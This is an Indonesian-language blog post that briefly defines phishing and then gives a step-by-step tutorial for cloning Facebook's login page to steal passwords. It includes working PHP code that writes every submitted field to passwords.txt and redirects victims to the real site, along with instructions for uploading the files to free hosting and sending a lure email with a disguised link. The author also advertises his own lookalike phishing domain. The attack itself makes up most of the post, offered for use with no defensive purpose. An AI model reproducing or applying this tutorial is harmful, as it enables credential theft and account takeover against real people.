Phising merupakan kata plesetan dari bahasa Inggris yang berarti memancing. Dalam dunia yang serba terhubung secara elektronik saat ini, istilah phising banyak diartikan sebagai suatu cara untuk memancing seseorang ke halaman tertentu.
Phising tidak jarang digunakan oleh para pelaku kriminal di internet untuk memancing seseorang agar mendatangi alamat web melalui e-mail, salah satu tujuannya adalah untuk menjebol informasi yang sangat pribadi dari sang penerima email, seperti password, kartu kredit, dll.
Diantaranya dengan mengirimkan informasi yang seakan-akan dari penerima e-mail mendapatkan pesan dari sebuah situs, lalu mengundangnya untuk mendatangi sebuah situs palsu. Situs palsu dibuat sedemikian rupa yang penampilannya mirip dengan situs asli. lalu ketika korban mengisikan password maka pada saat itulah penjahat ini mengetahui password korban. Penggunaan situs palsu ini disebut juga dengan istilah pharming.
Ok..gue akan coba mengulas bagaimana cara membuat situs phising tersebut
1. Masuk firefox-buka facebook (ya iyalah)
2. Klik view – page source (atau pencet Ctrl+U)
3. Kopi kode nya ke notepad
4. Cari kata ‘action’. Caranya Ctrl + F ketik action pada box yang muncul trus enter. Kira2 ntar kayak gini. (yang ane kasih lingkaran merah itu yang akan kita edit)
5. Ganti kata POST disitu menjadi GET. Dan alamat web setelah action menjadi kena.php
6. Simpan dengan nama index.php. ingat extensinya harus .php. jangan lupa save as typenya
diganti All File
7. Buat dokumen baru di notepad. Kemudian paste kode dibawah ini
<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Lihat dibaris ketiga, ada kode password.txt. berarti ntar hasil phising password kita akan
diletakkan di sana.
Save as kode php diatas dengan nama kena.php
8. Buat dokumen notepad baru, biarin kosong dan save dengan nama password.txt.
9. Upload ke tiga file tadi (index.php, kena.php, dan password.txt) ke hostingan ente
sekalian. Caranya cari di google ya . jadi deh situs phising kita
10. Cara terakhir ni. Biar kelihatan menyakinkan buat email seperti ini. Kirim email ini ke
orang yang mau ente curi passwordnya
11. Ingat, http://www.facebook.com/n/?reqs.php kita bikin hyperlink ke alamat situs phising kita. Kelihatannya lumayan menyakinkan, padahal itu Cuma jebakan haha . Ini karya ane. http://www.favebook.freehostia.com mampir ya klo belum di banned
Source : http://sukabiru.wordpress.com/2009/08/09/bikin-situs-phising-facebook/
